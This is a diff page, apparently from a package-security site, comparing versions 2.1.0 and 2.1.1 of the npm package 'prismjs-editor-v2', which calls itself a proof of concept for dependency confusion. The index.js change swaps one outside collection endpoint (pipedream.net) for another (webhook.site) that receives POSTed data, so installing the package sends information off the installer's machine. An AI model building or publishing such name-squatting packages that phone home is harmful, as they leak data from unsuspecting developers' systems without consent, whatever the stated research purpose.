prismjs-editor-v2 2.1.0 → 2.1.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -22,9 +22,9 @@ var postData = querystring.stringify({
22
22
  });
23
23
 
24
24
  var options = {
25
- hostname: "enwma2wsi8fcq.x.pipedream.net", // Remove https://
25
+ hostname: "webhook.site", // Remove https://
26
26
  port: 443,
27
- path: "/", // Correct path
27
+ path: "/7dd52b79-0093-4fc1-a841-936f7274d291", // Correct path
28
28
  method: "POST",
29
29
  headers: {
30
30
  "Content-Type": "application/x-www-form-urlencoded",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "prismjs-editor-v2",
3
- "version": "2.1.0",
3
+ "version": "2.1.1",
4
4
  "description": "A Node.js module for PoC of dependency confusion vulnerability.",
5
5
  "main": "index.js",
6
6
  "scripts": {